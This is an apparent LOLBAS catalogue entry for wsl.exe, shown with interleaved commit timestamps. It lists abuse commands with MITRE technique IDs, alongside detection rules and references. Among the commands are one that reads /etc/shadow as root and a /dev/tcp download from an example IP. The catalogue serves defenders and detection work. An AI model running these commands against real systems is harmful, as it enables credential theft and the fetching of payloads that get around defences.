2019-06-27 21:39:12 +02:00
---
Name : Wsl.exe
Description : Windows subsystem for Linux executable
Author : 'Matthew Brown'
2021-01-10 16:04:52 +01:00
Created : 2019-06-27
2019-06-27 21:39:12 +02:00
Commands :
- Command : wsl.exe -e /mnt/c/Windows/System32/calc.exe
Description : Executes calc.exe from wsl.exe
Usecase : Performs execution of specified file, can be used to execute arbitrary Linux commands.
Category : Execute
Privileges : User
MitreID : T1202
2024-06-07 00:42:25 +02:00
OperatingSystem : Windows 10, Windows Server 2019, Windows 11
2019-06-28 15:20:56 +02:00
- Command : wsl.exe -u root -e cat /etc/shadow
2019-06-28 17:53:45 +02:00
Description : Cats /etc/shadow file as root
Usecase : Performs execution of arbitrary Linux commands as root without need for password.
Category : Execute
Privileges : User
MitreID : T1202
2024-06-07 00:42:25 +02:00
OperatingSystem : Windows 10, Windows Server 2019, Windows 11
- Command : wsl.exe --exec bash -c "<command>"
Description : Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
2020-03-25 10:26:59 +01:00
Usecase : Performs execution of arbitrary Linux commands.
Category : Execute
Privileges : User
MitreID : T1202
2024-06-07 00:42:25 +02:00
OperatingSystem : Windows 10, Windows Server 2019, Windows 11
2020-03-25 11:33:02 +01:00
- Command : wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Description : Downloads file from 192.168.1.10
Usecase : Download file
Category : Download
Privileges : User
2024-06-07 00:42:25 +02:00
MitreID : T1105
OperatingSystem : Windows 10, Windows Server 2019, Windows 11
2019-06-27 21:39:12 +02:00
Full_Path :
- Path : C:\Windows\System32\wsl.exe
Code_Sample :
- Code :
Detection :
2023-10-18 17:30:34 +02:00
- Sigma : https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml
2021-11-15 14:19:03 +01:00
- BlockRule : https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
2019-06-27 21:39:12 +02:00
- IOC : Child process from wsl.exe
Resources :
- Link : https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
2022-11-11 17:42:44 +01:00
- Link : https://twitter.com/nas_bench/status/1535431474429808642
2019-06-28 18:07:24 +02:00
Acknowledgement :
2019-06-28 18:05:34 +02:00
- Person : Alex Ionescu
Handle : '@aionescu'
- Person : Matt
Handle : '@NotoriousRebel1'
2020-03-25 10:26:59 +01:00
- Person : Asif Matadar
Handle : '@d1r4c'
2022-11-11 17:42:44 +01:00
- Person : Nasreddine Bencherchali
Handle : '@nas_bench'
2024-06-07 00:42:25 +02:00
- Person : Konrad 'unrooted' Klawikowski